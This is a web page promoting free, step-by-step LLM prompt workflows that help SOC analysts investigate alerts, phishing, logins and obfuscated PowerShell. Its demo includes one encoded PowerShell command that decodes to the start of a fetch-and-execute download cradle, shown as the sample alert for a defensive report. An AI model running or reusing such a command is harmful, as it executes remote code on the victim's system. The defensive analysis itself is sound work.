Paste alerts, logs, or phishing emails → follow structured steps → generate a SOC investigation summary in seconds.
Structured investigation workflows covering the most common SOC alerts. Designed for analysts working with SIEM, EDR, and cloud security alerts.
Paste any security alert, log entry, phishing email, or suspicious command. Works with alerts from SIEM, EDR, email security, or firewall logs.
Structured workflows guide you through decoding, behavior analysis, threat mapping, and investigation checklists — the same process used by experienced SOC analysts.
Produce a ready-to-paste SOC investigation summary including severity, MITRE ATT&CK mapping, IOCs, and recommended actions.
No signup required. Works with ChatGPT, Claude, or any LLM.
Jump directly to the right workflow
Used by SOC analysts to investigate:
Investigate network traffic anomalies and suspicious connections using structured AI analysis of VPC flow logs.
View WorkflowStep-by-step workflow to analyze suspicious emails, verify sender authenticity, and identify phishing indicators.
View WorkflowEfficiently triage security alerts using AI-assisted analysis to determine severity and next actions.
View WorkflowQuickly understand unfamiliar security alerts with context-aware explanations and response guidance.
View WorkflowSystematically analyze suspicious URLs to identify phishing attempts and malicious infrastructure.
View WorkflowDecode obfuscated PowerShell, identify attacker behavior, and generate a SOC-ready investigation summary.
View WorkflowAnalyze suspicious logins, MFA fatigue, and account takeover activity step-by-step.
View WorkflowAssess ransomware indicators, identify blast radius, and generate a management-ready incident report.
View WorkflowSee how an analyst turns a raw alert into a structured SOC report in minutes.
powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA IABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA
ALERT: Suspicious PowerShell Execution SEVERITY: High CONFIDENCE: Medium KEY INDICATORS: - Base64 encoded command detected - Possible payload download from external server - ExecutionPolicy bypass attempted RECOMMENDED ACTIONS: 1. Decode and analyze the Base64 command 2. Review parent process and execution context 3. Investigate outbound network connections DISPOSITION: Needs Investigation
SOC.Workflows started from a simple frustration — AI tools are powerful, but most security analysts don't know how to prompt them effectively for real investigation work.
These workflows are different. Each one is structured, step-by-step, and built around real SOC scenarios. Not generic prompts. Not marketing fluff. Just guided inputs that help you investigate faster and document better.
Currently free. Always will be for defenders.
Questions, feedback, or just want to say hello — reach us at gauravkundu12@gmail.com
Get notified when new workflows are added. No spam. Unsubscribe anytime.